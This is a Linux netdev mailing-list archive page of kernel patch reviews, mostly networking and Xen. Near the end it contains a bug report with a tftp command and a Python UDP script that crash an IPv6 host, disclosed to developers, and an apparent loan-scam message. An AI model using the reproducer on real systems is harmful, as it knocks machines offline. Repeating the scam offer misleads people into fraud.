From: Mark Brown @ 2013-10-29 16:04 UTC (permalink / raw)
To: Simon Horman
Cc: linux-fbdev, Wolfram Sang, Linus Walleij, Guennadi Liakhovetski,
Thierry Reding, linux-mtd, linux-i2c, Laurent Pinchart,
Vinod Koul, Joerg Roedel, linux-sh, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial, linux-input, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard, linux-media, linux-pwm,
Samuel Ortiz, linux-pm, Ian Molton, linux-arm-ker
In-Reply-To: <20131029060427.GF11580@verge.net.au>
[-- Attachment #1.1: Type: text/plain, Size: 223 bytes --]
On Tue, Oct 29, 2013 at 03:04:27PM +0900, Simon Horman wrote:
> I think this is a step in a good direction.
> However, I think it would be even better if the architecture dependency was
> removed completely.
Yes, please.
[-- Attachment #1.2: Digital signature --]
[-- Type: application/pgp-signature, Size: 836 bytes --]
[-- Attachment #2: Type: text/plain, Size: 176 bytes --]
_______________________________________________
linux-arm-kernel mailing list
linux-arm-kernel@lists.infradead.org
http://lists.infradead.org/mailman/listinfo/linux-arm-kernel
^ permalink raw reply
* Re: [PATCH net-next] xen-netback: allocate xenvif arrays using vzalloc.
From: Wei Liu @ 2013-10-29 15:50 UTC (permalink / raw)
To: Joby Poriyath
Cc: netdev, wei.liu2, ian.campbell, xen-devel, andrew.bennieston,
david.vrabel, malcolm.crossley
In-Reply-To: <20131029152628.GA3065@citrix.com>
On Tue, Oct 29, 2013 at 03:27:13PM +0000, Joby Poriyath wrote:
[...]
> +
> +static int allocate_xenvif_arrays(struct xenvif *vif)
> +{
> + vif->mmap_pages = vif->pending_tx_info = NULL;
> + vif->tx_copy_ops = vif->grant_copy_op = vif->meta = NULL;
> +
> + vif->mmap_pages = vzalloc(MAX_PENDING_REQS * sizeof(struct page *));
> + if (! vif->mmap_pages)
No space after "!".
> + goto fail;
> +
> + vif->pending_tx_info = vzalloc(MAX_PENDING_REQS *
> + sizeof(struct pending_tx_info));
> + if (! vif->pending_tx_info)
> + goto fail;
> +
> + vif->tx_copy_ops = vzalloc(2 * MAX_PENDING_REQS *
> + sizeof(struct gnttab_copy));
> + if (! vif->tx_copy_ops)
> + goto fail;
> +
> + vif->grant_copy_op = vzalloc(2 * XEN_NETIF_RX_RING_SIZE *
> + sizeof(struct gnttab_copy));
> + if (! vif->grant_copy_op)
> + goto fail;
> +
> + vif->meta = vzalloc(2 * XEN_NETIF_RX_RING_SIZE *
> + sizeof(struct xenvif_rx_meta));
Indentation.
> + if (! vif->meta)
> + goto fail;
> +
> + return 0;
> +
> +fail:
> + deallocate_xenvif_arrays(vif);
> + return 1;
return -ENOMEM;
> +}
> +
> struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
> unsigned int handle)
> {
> @@ -313,6 +367,12 @@ struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
> vif->ip_csum = 1;
> vif->dev = dev;
>
> + if (allocate_xenvif_arrays(vif)) {
> + netdev_warn(dev, "Could not create device: out of memory\n");
> + free_netdev(dev);
> + return ERR_PTR(-ENOMEM);
> + }
> +
> vif->credit_bytes = vif->remaining_credit = ~0UL;
> vif->credit_usec = 0UL;
> init_timer(&vif->credit_timeout);
> @@ -484,6 +544,7 @@ void xenvif_free(struct xenvif *vif)
>
> unregister_netdev(vif->dev);
>
> + deallocate_xenvif_arrays(vif);
> free_netdev(vif->dev);
>
> module_put(THIS_MODULE);
> diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
> index 828fdab..34c0c05 100644
> --- a/drivers/net/xen-netback/netback.c
> +++ b/drivers/net/xen-netback/netback.c
> @@ -602,12 +602,12 @@ void xenvif_rx_action(struct xenvif *vif)
> break;
> }
>
> - BUG_ON(npo.meta_prod > ARRAY_SIZE(vif->meta));
> + BUG_ON(npo.meta_prod > 2*XEN_NETIF_RX_RING_SIZE);
>
> if (!npo.copy_prod)
> return;
>
> - BUG_ON(npo.copy_prod > ARRAY_SIZE(vif->grant_copy_op));
> + BUG_ON(npo.copy_prod > 2*XEN_NETIF_RX_RING_SIZE);
It's better to
#define XEN_NETBK_RX_ARRAY_SIZE (2*XEN_NETIF_RX_RING_SIZE)
And use it consistently in code (allocation / comparison). Otherwise
it's easy to change one site and forget about others.
> gnttab_batch_copy(vif->grant_copy_op, npo.copy_prod);
>
> while ((skb = __skb_dequeue(&rxq)) != NULL) {
> @@ -1571,7 +1571,7 @@ static unsigned xenvif_tx_build_gops(struct xenvif *vif)
>
> vif->tx.req_cons = idx;
>
> - if ((gop-vif->tx_copy_ops) >= ARRAY_SIZE(vif->tx_copy_ops))
> + if ((gop-vif->tx_copy_ops) >= 2*MAX_PENDING_REQS)
Same here.
#define XEN_NETBK_TX_ARRAY_SIZE
Wei.
^ permalink raw reply
* Re: [PATCH net-next] xen-netback: allocate xenvif arrays using vzalloc.
From: Eric Dumazet @ 2013-10-29 15:43 UTC (permalink / raw)
To: Joby Poriyath
Cc: netdev, wei.liu2, ian.campbell, xen-devel, andrew.bennieston,
david.vrabel, malcolm.crossley
In-Reply-To: <20131029152628.GA3065@citrix.com>
On Tue, 2013-10-29 at 15:27 +0000, Joby Poriyath wrote:
> This will reduce memory pressure when allocating struct xenvif.
>
> The size of xenvif struct has increased from 168 to 36632 bytes (on x86-32).
> See commit b3f980bd827e6e81a050c518d60ed7811a83061d. This resulted in
> occasional netdev allocation failure in dom0 with 752MiB RAM, due to
> fragmented memory.
This looks overkill.
Replacing a single allocation of ~36 KB into 5 vmalloc() looks like you
did not really tried other things...
This should be done generically in alloc_netdev_mqs()
Take a look at commit 60877a32bce00041
("net: allow large number of tx queues")
^ permalink raw reply
* Realtek RTL8102E registers
From: Ivan Frederiks @ 2013-10-29 15:05 UTC (permalink / raw)
To: Linux r8169 crew
Hello!
I met troubles with RTL8102E operation (you can find detailed
description below). I suppose that those troubles are related to chip
misconfiguration. Maybe you have access to RTL8102E register
description? If yes, would you be so kind to share it with me?
Thank you in advance,
Ivan Frederiks
Embedded developer
Speech Technology Center
Phone: +7-812-331-0665, ext. 6123, 6942
Fax: +7-812-327-9297
P.S.
Issue description:
I'm currently working with a custom motherboard equipped with 2 RTL8102E
ICs and an Intel x86 SOM. SOM runs 32-bit Linux (Arch or Ubuntu).
By default I use r8169 driver. I know that Ethernet link is up (I
checked it with an oscilloscope and I see that RTL8102E link LEDs are
on). In most cases everything works fine. But sometimes driver reports
that link is down. After a power cycle driver reports, that link is up.
When I replace driver with r8101, it always reports that link is up, but
I observe other issues.
^ permalink raw reply
* [PATCH net-next] xen-netback: allocate xenvif arrays using vzalloc.
From: Joby Poriyath @ 2013-10-29 15:27 UTC (permalink / raw)
To: netdev
Cc: wei.liu2, ian.campbell, xen-devel, andrew.bennieston,
david.vrabel, malcolm.crossley
This will reduce memory pressure when allocating struct xenvif.
The size of xenvif struct has increased from 168 to 36632 bytes (on x86-32).
See commit b3f980bd827e6e81a050c518d60ed7811a83061d. This resulted in
occasional netdev allocation failure in dom0 with 752MiB RAM, due to
fragmented memory.
Signed-off-by: Joby Poriyath <joby.poriyath@citrix.com>
Signed-off-by: Andrew J. Bennieston <andrew.bennieston@citrix.com>
---
drivers/net/xen-netback/common.h | 10 +++---
drivers/net/xen-netback/interface.c | 61 +++++++++++++++++++++++++++++++++++
drivers/net/xen-netback/netback.c | 6 ++--
3 files changed, 69 insertions(+), 8 deletions(-)
diff --git a/drivers/net/xen-netback/common.h b/drivers/net/xen-netback/common.h
index 55b8dec..82515a3 100644
--- a/drivers/net/xen-netback/common.h
+++ b/drivers/net/xen-netback/common.h
@@ -114,17 +114,17 @@ struct xenvif {
char tx_irq_name[IFNAMSIZ+4]; /* DEVNAME-tx */
struct xen_netif_tx_back_ring tx;
struct sk_buff_head tx_queue;
- struct page *mmap_pages[MAX_PENDING_REQS];
+ struct page **mmap_pages; /* [MAX_PENDING_REQS]; */
pending_ring_idx_t pending_prod;
pending_ring_idx_t pending_cons;
u16 pending_ring[MAX_PENDING_REQS];
- struct pending_tx_info pending_tx_info[MAX_PENDING_REQS];
+ struct pending_tx_info *pending_tx_info; /* [MAX_PENDING_REQS]; */
/* Coalescing tx requests before copying makes number of grant
* copy ops greater or equal to number of slots required. In
* worst case a tx request consumes 2 gnttab_copy.
*/
- struct gnttab_copy tx_copy_ops[2*MAX_PENDING_REQS];
+ struct gnttab_copy *tx_copy_ops; /* [2*MAX_PENDING_REQS]; */
/* Use kthread for guest RX */
@@ -147,8 +147,8 @@ struct xenvif {
* head/fragment page uses 2 copy operations because it
* straddles two buffers in the frontend.
*/
- struct gnttab_copy grant_copy_op[2*XEN_NETIF_RX_RING_SIZE];
- struct xenvif_rx_meta meta[2*XEN_NETIF_RX_RING_SIZE];
+ struct gnttab_copy *grant_copy_op; /* [2*XEN_NETIF_RX_RING_SIZE]; */
+ struct xenvif_rx_meta *meta; /* [2*XEN_NETIF_RX_RING_SIZE]; */
u8 fe_dev_addr[6];
diff --git a/drivers/net/xen-netback/interface.c b/drivers/net/xen-netback/interface.c
index e4aa267..d4a9807 100644
--- a/drivers/net/xen-netback/interface.c
+++ b/drivers/net/xen-netback/interface.c
@@ -288,6 +288,60 @@ static const struct net_device_ops xenvif_netdev_ops = {
.ndo_validate_addr = eth_validate_addr,
};
+static void deallocate_xenvif_arrays(struct xenvif *vif)
+{
+ vfree(vif->mmap_pages);
+ vif->mmap_pages = NULL;
+
+ vfree(vif->pending_tx_info);
+ vif->pending_tx_info = NULL;
+
+ vfree(vif->tx_copy_ops);
+ vif->tx_copy_ops = NULL;
+
+ vfree(vif->grant_copy_op);
+ vif->grant_copy_op = NULL;
+
+ vfree(vif->meta);
+ vif->meta = NULL;
+}
+
+static int allocate_xenvif_arrays(struct xenvif *vif)
+{
+ vif->mmap_pages = vif->pending_tx_info = NULL;
+ vif->tx_copy_ops = vif->grant_copy_op = vif->meta = NULL;
+
+ vif->mmap_pages = vzalloc(MAX_PENDING_REQS * sizeof(struct page *));
+ if (! vif->mmap_pages)
+ goto fail;
+
+ vif->pending_tx_info = vzalloc(MAX_PENDING_REQS *
+ sizeof(struct pending_tx_info));
+ if (! vif->pending_tx_info)
+ goto fail;
+
+ vif->tx_copy_ops = vzalloc(2 * MAX_PENDING_REQS *
+ sizeof(struct gnttab_copy));
+ if (! vif->tx_copy_ops)
+ goto fail;
+
+ vif->grant_copy_op = vzalloc(2 * XEN_NETIF_RX_RING_SIZE *
+ sizeof(struct gnttab_copy));
+ if (! vif->grant_copy_op)
+ goto fail;
+
+ vif->meta = vzalloc(2 * XEN_NETIF_RX_RING_SIZE *
+ sizeof(struct xenvif_rx_meta));
+ if (! vif->meta)
+ goto fail;
+
+ return 0;
+
+fail:
+ deallocate_xenvif_arrays(vif);
+ return 1;
+}
+
struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
unsigned int handle)
{
@@ -313,6 +367,12 @@ struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
vif->ip_csum = 1;
vif->dev = dev;
+ if (allocate_xenvif_arrays(vif)) {
+ netdev_warn(dev, "Could not create device: out of memory\n");
+ free_netdev(dev);
+ return ERR_PTR(-ENOMEM);
+ }
+
vif->credit_bytes = vif->remaining_credit = ~0UL;
vif->credit_usec = 0UL;
init_timer(&vif->credit_timeout);
@@ -484,6 +544,7 @@ void xenvif_free(struct xenvif *vif)
unregister_netdev(vif->dev);
+ deallocate_xenvif_arrays(vif);
free_netdev(vif->dev);
module_put(THIS_MODULE);
diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
index 828fdab..34c0c05 100644
--- a/drivers/net/xen-netback/netback.c
+++ b/drivers/net/xen-netback/netback.c
@@ -602,12 +602,12 @@ void xenvif_rx_action(struct xenvif *vif)
break;
}
- BUG_ON(npo.meta_prod > ARRAY_SIZE(vif->meta));
+ BUG_ON(npo.meta_prod > 2*XEN_NETIF_RX_RING_SIZE);
if (!npo.copy_prod)
return;
- BUG_ON(npo.copy_prod > ARRAY_SIZE(vif->grant_copy_op));
+ BUG_ON(npo.copy_prod > 2*XEN_NETIF_RX_RING_SIZE);
gnttab_batch_copy(vif->grant_copy_op, npo.copy_prod);
while ((skb = __skb_dequeue(&rxq)) != NULL) {
@@ -1571,7 +1571,7 @@ static unsigned xenvif_tx_build_gops(struct xenvif *vif)
vif->tx.req_cons = idx;
- if ((gop-vif->tx_copy_ops) >= ARRAY_SIZE(vif->tx_copy_ops))
+ if ((gop-vif->tx_copy_ops) >= 2*MAX_PENDING_REQS)
break;
}
--
1.7.10.4
^ permalink raw reply related
* Loan Offer
From: Peter Moore @ 2013-10-29 15:25 UTC (permalink / raw)
To: Recipients
Hello Everybody, I am Dr. Peter Moore from Money Mutual, a private legit and govt approved lender,i give loan with a low interest rate of 3% to everyone,i.e house loan,car loan,business loan,education loan e.t.c, you can contact me at Email: peterloan85@gmail.com
^ permalink raw reply
* Re: [PATCH] bgmac: don't update slot on skb alloc/dma mapping error
From: Nathan Hintz @ 2013-10-29 15:20 UTC (permalink / raw)
To: Rafał Miłecki; +Cc: Network Development
In-Reply-To: <CACna6rzqwz_wp=9ayX6AUZvVSNwdAg-LniXtNwy9eRFDEoNspg@mail.gmail.com>
On Tue, 29 Oct 2013 09:28:56 +0100
Rafał Miłecki <zajec5@gmail.com> wrote:
> 2013/10/29 Nathan Hintz <nlhintz@hotmail.com>:
> > On Tue, 29 Oct 2013 07:52:58 +0100
> > Rafał Miłecki <zajec5@gmail.com> wrote:
> >
> >> 2013/10/29 Nathan Hintz <nlhintz@hotmail.com>:
> >> > Don't update the slot in "bgmac_dma_rx_skb_for_slot" unless both the
> >> > skb alloc and dma mapping are successful; and free the newly allocated
> >> > skb if a dma mapping error occurs.
> >> > returning when an error occurs.
> >>
> >> In case of bgmac_dma_rx_skb_for_slot failure we're giving up anyway
> >> (and freeing everything), but with your patch code is simpler to
> >> understand, so I'm OK with that.
> >>
> >> Acked-by: Rafał Miłecki <zajec5@gmail.com>
> >>
> >
> > I might be misunderstanding; but it in the case of failure, it appeared to me
> > that the currently received packet was dropped and the old skb would continue
> > to be assigned to the slot and would be used to receive future packets (this
> > would continue until bgmac_dma_rx_skb_for_slot was successful).
>
> I was commenting on current usage (.), not my WIP patch
> for bgmac_dma_rx_read :)
>
> Your patch will be helpful for my bgmac_dma_rx_read rework.
>
You're right, I was commenting to you WIP. The commit message should probably
be changed to remove the statement "This will prevent an skb leak upon returning
when an error occurs", as this doesn't occur with the usage in bgmac_dma_alloc.
Unfortunately, I won't be able to send a revised patch until tonight.
Nathan
--
Nathan
^ permalink raw reply
* [PATCH v2 net-next] net: introduce gro_frag_list_enable sysctl
From: Eric Dumazet @ 2013-10-29 15:12 UTC (permalink / raw)
To: Christoph Paasch
Cc: David Miller, Herbert Xu, netdev, Jerry Chu, Michael Dalton
In-Reply-To: <1383051962.5464.25.camel@edumazet-glaptop.roam.corp.google.com>
From: Eric Dumazet <edumazet@google.com>
Christoph Paasch and Jerry Chu reported crashes in skb_segment() caused
by commit 8a29111c7ca6 ("net: gro: allow to build full sized skb")
(Jerry is working on adding native GRO support for tunnels)
skb_segment() only deals with a frag_list chain containing MSS sized
fragments.
This patch adds support any kind of frag, and adds a new sysctl,
as clearly the GRO layer should avoid building frag_list skbs
on a router, as the segmentation is adding cpu overhead.
Note that we could try to reuse page fragments instead of doing
copy to linear skbs, but this requires a fair amount of work,
and possible truesize nightmares, as we do not track individual
(per page fragment) truesizes.
/proc/sys/net/core/gro_frag_list_enable possible values are :
0 : GRO layer is not allowed to use frag_list to extend skb capacity
1 : GRO layer is allowed to use frag_list, but skb_segment()
automatically sets the sysctl to 0.
2 : GRO is allowed to use frag_list, and skb_segment() wont
clear the sysctl.
Default value is 1 : automatic discovery
Reported-by: Christoph Paasch <christoph.paasch@uclouvain.be>
Reported-by: Jerry Chu <hkchu@google.com>
Cc: Michael Dalton <mwdalton@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
---
v2: added missing sysctl definition in skbuff.c
Documentation/sysctl/net.txt | 19 +++++++++++++++++++
include/linux/netdevice.h | 1 +
net/core/skbuff.c | 31 ++++++++++++++++++++++---------
net/core/sysctl_net_core.c | 10 ++++++++++
4 files changed, 52 insertions(+), 9 deletions(-)
diff --git a/Documentation/sysctl/net.txt b/Documentation/sysctl/net.txt
index 9a0319a82470..8778568ae64e 100644
--- a/Documentation/sysctl/net.txt
+++ b/Documentation/sysctl/net.txt
@@ -87,6 +87,25 @@ sysctl.net.busy_read globally.
Will increase power usage.
Default: 0 (off)
+gro_frag_list_enable
+--------------------
+
+GRO layer can build full size GRO packets (~64K of payload) if it is allowed
+to extend skb using the frag_list pointer. However, this strategy is a win
+on hosts, where TCP flows are terminated. For a router, using frag_list
+skbs is not a win because we have to segment skbs before transmit,
+as most NIC drivers do not support frag_list.
+As soon as one frag_list skb has to be segmented, this sysctl is automatically
+changed from 1 to 0.
+If the value is set to 2, kernel wont change it.
+
+Choices : 0 (off),
+ 1 (on, with automatic change to 0)
+ 2 (on, permanent)
+
+Default: 1 (on, with automatic downgrade on a router)
+
+
rmem_default
------------
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 27f62f746621..b82ff52f301e 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -2807,6 +2807,7 @@ extern int netdev_max_backlog;
extern int netdev_tstamp_prequeue;
extern int weight_p;
extern int bpf_jit_enable;
+extern int sysctl_gro_frag_list_enable;
bool netdev_has_upper_dev(struct net_device *dev, struct net_device *upper_dev);
bool netdev_has_any_upper_dev(struct net_device *dev);
diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index 0ab32faa520f..e089cd2782e5 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -74,6 +74,8 @@
struct kmem_cache *skbuff_head_cache __read_mostly;
static struct kmem_cache *skbuff_fclone_cache __read_mostly;
+int sysctl_gro_frag_list_enable __read_mostly = 1;
+
static void sock_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
@@ -2761,7 +2763,7 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
unsigned int len;
__be16 proto;
bool csum;
- int sg = !!(features & NETIF_F_SG);
+ bool sg = !!(features & NETIF_F_SG);
int nfrags = skb_shinfo(skb)->nr_frags;
int err = -ENOMEM;
int i = 0;
@@ -2793,7 +2795,13 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
hsize = len;
if (!hsize && i >= nfrags) {
- BUG_ON(fskb->len != len);
+ if (fskb->len != len) {
+ if (sysctl_gro_frag_list_enable == 1)
+ sysctl_gro_frag_list_enable = 0;
+ hsize = len;
+ sg = false;
+ goto do_linear;
+ }
pos += len;
nskb = skb_clone(fskb, GFP_ATOMIC);
@@ -2812,6 +2820,7 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
skb_release_head_state(nskb);
__skb_push(nskb, doffset);
} else {
+do_linear:
nskb = __alloc_skb(hsize + doffset + headroom,
GFP_ATOMIC, skb_alloc_rx_flag(skb),
NUMA_NO_NODE);
@@ -2838,9 +2847,6 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
nskb->data - tnl_hlen,
doffset + tnl_hlen);
- if (fskb != skb_shinfo(skb)->frag_list)
- goto perform_csum_check;
-
if (!sg) {
nskb->ip_summed = CHECKSUM_NONE;
nskb->csum = skb_copy_and_csum_bits(skb, offset,
@@ -2849,6 +2855,9 @@ struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features)
continue;
}
+ if (fskb != skb_shinfo(skb)->frag_list)
+ goto perform_csum_check;
+
frag = skb_shinfo(nskb)->frags;
skb_copy_from_linear_data_offset(skb, offset,
@@ -2944,9 +2953,11 @@ int skb_gro_receive(struct sk_buff **head, struct sk_buff *skb)
int i = skbinfo->nr_frags;
int nr_frags = pinfo->nr_frags + i;
- if (nr_frags > MAX_SKB_FRAGS)
+ if (unlikely(nr_frags > MAX_SKB_FRAGS)) {
+ if (!sysctl_gro_frag_list_enable)
+ return -E2BIG;
goto merge;
-
+ }
offset -= headlen;
pinfo->nr_frags = nr_frags;
skbinfo->nr_frags = 0;
@@ -2977,9 +2988,11 @@ int skb_gro_receive(struct sk_buff **head, struct sk_buff *skb)
unsigned int first_size = headlen - offset;
unsigned int first_offset;
- if (nr_frags + 1 + skbinfo->nr_frags > MAX_SKB_FRAGS)
+ if (unlikely(nr_frags + 1 + skbinfo->nr_frags > MAX_SKB_FRAGS)) {
+ if (!sysctl_gro_frag_list_enable)
+ return -E2BIG;
goto merge;
-
+ }
first_offset = skb->data -
(unsigned char *)page_address(page) +
offset;
diff --git a/net/core/sysctl_net_core.c b/net/core/sysctl_net_core.c
index cca444190907..2d6aaf6d5838 100644
--- a/net/core/sysctl_net_core.c
+++ b/net/core/sysctl_net_core.c
@@ -24,6 +24,7 @@
static int zero = 0;
static int one = 1;
+static int two = 2;
static int ushort_max = USHRT_MAX;
#ifdef CONFIG_RPS
@@ -360,6 +361,15 @@ static struct ctl_table net_core_table[] = {
.mode = 0644,
.proc_handler = proc_dointvec
},
+ {
+ .procname = "gro_frag_list_enable",
+ .data = &sysctl_gro_frag_list_enable,
+ .maxlen = sizeof(int),
+ .mode = 0644,
+ .proc_handler = proc_dointvec_minmax,
+ .extra1 = &zero,
+ .extra2 = &two,
+ },
{ }
};
^ permalink raw reply related
* Re: Bug in skb_segment: fskb->len != len
From: Eric Dumazet @ 2013-10-29 15:08 UTC (permalink / raw)
To: Herbert Xu; +Cc: Christoph Paasch, netdev
In-Reply-To: <20131029144100.GA28046@gondor.apana.org.au>
On Tue, 2013-10-29 at 22:41 +0800, Herbert Xu wrote:
> On Mon, Oct 28, 2013 at 06:15:08PM -0700, Eric Dumazet wrote:
> > On Mon, 2013-10-28 at 06:21 -0700, Eric Dumazet wrote:
> >
> > > But we also need to fix the skb_segment() bug anyway.
> >
> > Hi Christoph
> >
> > I cooked a minimal patch, could you please try it ?
> >
> > I'll refactor skb_segment() to be smarter for the next release
> > (linux-3.14).
>
> I think this patch is just papering over a deeper issue.
>
> We should either be building skbs in pages, or using frag_list.
> In the latter case each frag_list must be exactly mss bytes,
> except for the last one.
>
> So if we're crashing here it means that we got mixed up on the
> receive side, either because the driver was sending us bogus skbs
> or we're simply buggy.
>
> So we need to figure out why the receive-side (i.e., GRO) is building
> these bogus packets, and not papering over them on the transmit-side.
It looks like you missed a lot of recent changes.
GRO layer was updated to be able to stack two or three sk_buff,
fully populated with page frags.
Thats quite mandatory to support line rate for 40Gb links.
We now have to make skb_segment() aware of this, I missed this part.
^ permalink raw reply
* Re: [PATCH] bridge: pass correct vlan id to multicast code
From: Vlad Yasevich @ 2013-10-29 15:00 UTC (permalink / raw)
To: Amos Kong; +Cc: netdev, shemminger, makita.toshiaki
In-Reply-To: <20131029023646.GA2795@amosk.info>
On 10/28/2013 10:36 PM, Amos Kong wrote:
> On Mon, Oct 28, 2013 at 03:45:07PM -0400, Vlad Yasevich wrote:
>> diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c
>> index 8b0b610..686284f 100644
>> --- a/net/bridge/br_multicast.c
>> +++ b/net/bridge/br_multicast.c
>> @@ -947,7 +947,8 @@ void br_multicast_disable_port(struct net_bridge_port *port)
>>
>> static int br_ip4_multicast_igmp3_report(struct net_bridge *br,
>> struct net_bridge_port *port,
>> - struct sk_buff *skb)
>> + struct sk_buff *skb,
>> + u16 vid)
>> {
>> struct igmpv3_report *ih;
>> struct igmpv3_grec *grec;
>> @@ -957,12 +958,10 @@ static int br_ip4_multicast_igmp3_report(struct net_bridge *br,
>> int type;
>> int err = 0;
>> __be32 group;
>> - u16 vid = 0;
>>
>> if (!pskb_may_pull(skb, sizeof(*ih)))
>> return -EINVAL;
>>
>> - br_vlan_get_tag(skb, &vid);
>
Sorry, missed this question last time.
> After applied the patch, we always use vid in br_dev_xmit()->br_allowed_ingress(),
> is it possible that the vlan of bridge is re-enabled when other
> changed functions are called?
>
If the frame was allowed to enter, then the current configuration should
apply the the frame. If the config changes during the frame
processing we don't really want to use that. Otherwise, you'd get
inconsistent results.
> We can just add a enabled checking before this kind of br_vlan_get_tag()?
>
> if (!br->vlan_enabled)
> br_vlan_get_tag(skb2, &vid);
>
This sort of what the next patches I am working on do. But we still
want to get the vlan id once and then use it throught out. There is
no need to retrieve it again.
-vlad
>
>> ih = igmpv3_report_hdr(skb);
>> num = ntohs(ih->ngrec);
>> len = sizeof(*ih);
>
> ...
>
^ permalink raw reply
* Re: Bug in skb_segment: fskb->len != len
From: Herbert Xu @ 2013-10-29 14:41 UTC (permalink / raw)
To: Eric Dumazet; +Cc: Christoph Paasch, netdev
In-Reply-To: <1383009308.5464.2.camel@edumazet-glaptop.roam.corp.google.com>
On Mon, Oct 28, 2013 at 06:15:08PM -0700, Eric Dumazet wrote:
> On Mon, 2013-10-28 at 06:21 -0700, Eric Dumazet wrote:
>
> > But we also need to fix the skb_segment() bug anyway.
>
> Hi Christoph
>
> I cooked a minimal patch, could you please try it ?
>
> I'll refactor skb_segment() to be smarter for the next release
> (linux-3.14).
I think this patch is just papering over a deeper issue.
We should either be building skbs in pages, or using frag_list.
In the latter case each frag_list must be exactly mss bytes,
except for the last one.
So if we're crashing here it means that we got mixed up on the
receive side, either because the driver was sending us bogus skbs
or we're simply buggy.
So we need to figure out why the receive-side (i.e., GRO) is building
these bogus packets, and not papering over them on the transmit-side.
Cheers,
--
Email: Herbert Xu <herbert@gondor.apana.org.au>
Home Page: http://gondor.apana.org.au/~herbert/
PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt
^ permalink raw reply
* Kernel crash - Large UDP packet over IPv6 over UFO-enabled device with TBF qdisc (No corking needed)
From: Saran Neti @ 2013-10-29 14:30 UTC (permalink / raw)
To: netdev@vger.kernel.org; +Cc: dl TSL Vulnerability Research Team
Hi,
Sending a UDP packet of size larger than MTU over IPv6 over a device that has UFO enabled, and that uses the TBF qdisc causes the kernel to crash. Unlike CVE-2013-4387, this does not require a corked socket and can be remotely triggered by a tftp request.
Configuration:
1. Configure a Linux system with UDP UFO enabled (e.g. virtio_net).
# ethtool -k eth0 | grep udp-frag
udp-fragmentation-offload: on
2. Assign an IPv6 address to it.
# ip addr show dev eth0 | grep inet6
inet6 fd00:abcd:abcd:123::2/64 scope global
3. Change qdisc to tbf
# tc qdisc replace dev eth0 root tbf rate 200kbit latency 20ms burst 5kb
Reproduction:
a) Over Network
1. Run tftp daemon (e.g. using tftp-hpa).
# in.tftpd -6 -l -s /srv/tftp
2. From a different machine, issue a tftp command to cause the kernel to crash:
# atftp --option "blksize 5000" -g -r file1 fd00:abcd:abcd:123::2 69
Or b) Locally
Run the following python script on the vulnerable system to crash it:
#!/usr/bin/python
import socket
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, 0)
sock.sendto("A"*5000, ('fd00:abcd:abcd:123::3', 1234, 0, 0))
Versions tested:
Mainline - 3.12-rc7 (HEAD: 959f58544b7f20c92d5eb43d1232c96c15c01bfb)
Stable - 3.11.6
This bug triggers on the default config as shipped with the Arch Linux kernel.
I modified it to turn on kgdb (config file attached).
Platform:
# cat /proc/cpuinfo | grep -E "model|flags"
model : 2
model name : QEMU Virtual CPU version 1.6.1
flags : fpu de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pse36 clflush mmx fxsr sse sse2 syscall nx lm rep_good nopl pni cx16 hypervisor lahf_lm
# cat /proc/modules | grep virtio_net
virtio_net 18821 0 - Live 0xffffffffa0108000
virtio_ring 7846 5 virtio_console,virtio_balloon,virtio_blk,virtio_net,virtio_pci, Live 0xffffffffa001e000
virtio 3954 5 virtio_console,virtio_balloon,virtio_blk,virtio_net,virtio_pci, Live 0xffffffffa001a000
Crash analysis: Using 3.12-rc7 compiled with KGDB.
# (gdb) bt
#0 0xffffffff8129a6bd in memcpy () at arch/x86/lib/memcpy_64.S:69
#1 0xffffffff813e2d2a in skb_copy_from_linear_data_offset (skb=0xffff880036abd500, len=62, to=<optimized out>,
offset=-65536) at include/linux/skbuff.h:2425
#2 skb_segment (skb=skb@entry=0xffff880036abd500, features=features@entry=3221244521) at net/core/skbuff.c:2849
#3 0xffffffff814c3e25 in udp6_ufo_fragment (skb=0xffff880036abd500, features=3221244521) at net/ipv6/udp_offload.c:119
#4 0xffffffff814c3867 in ipv6_gso_segment (skb=0xffff880036abd500, features=3221244521) at net/ipv6/ip6_offload.c:120
#5 0xffffffff813f062d in skb_mac_gso_segment (skb=skb@entry=0xffff880036abd500, features=features@entry=3221244521)
at net/core/dev.c:2333
#6 0xffffffff813f0769 in __skb_gso_segment (skb=skb@entry=0xffff880036abd500, features=3221244521,
tx_path=tx_path@entry=true) at net/core/dev.c:2384
#7 0xffffffff81423eab in skb_gso_segment (features=<optimized out>, skb=0xffff880036abd500)
at include/linux/netdevice.h:2844
#8 tbf_segment (sch=0xffff88003c339800, skb=0xffff880036abd500) at net/sched/sch_tbf.c:130
#9 tbf_enqueue (skb=0xffff880036abd500, sch=0xffff88003c339800) at net/sched/sch_tbf.c:167
#10 0xffffffff813f1121 in __dev_xmit_skb (txq=0xffff88003b261e00, dev=0xffff88003b115000, q=0xffff88003c339800,
skb=0xffff880036abd500) at net/core/dev.c:2728
#11 dev_queue_xmit (skb=skb@entry=0xffff880036abd500) at net/core/dev.c:2828
#12 0xffffffff81491d7e in neigh_hh_output (skb=<optimized out>, hh=<optimized out>) at include/net/neighbour.h:355
#13 dst_neigh_output (dst=<optimized out>, skb=0xffff880036abd500, n=0xffff88003b3d7e00) at include/net/dst.h:411
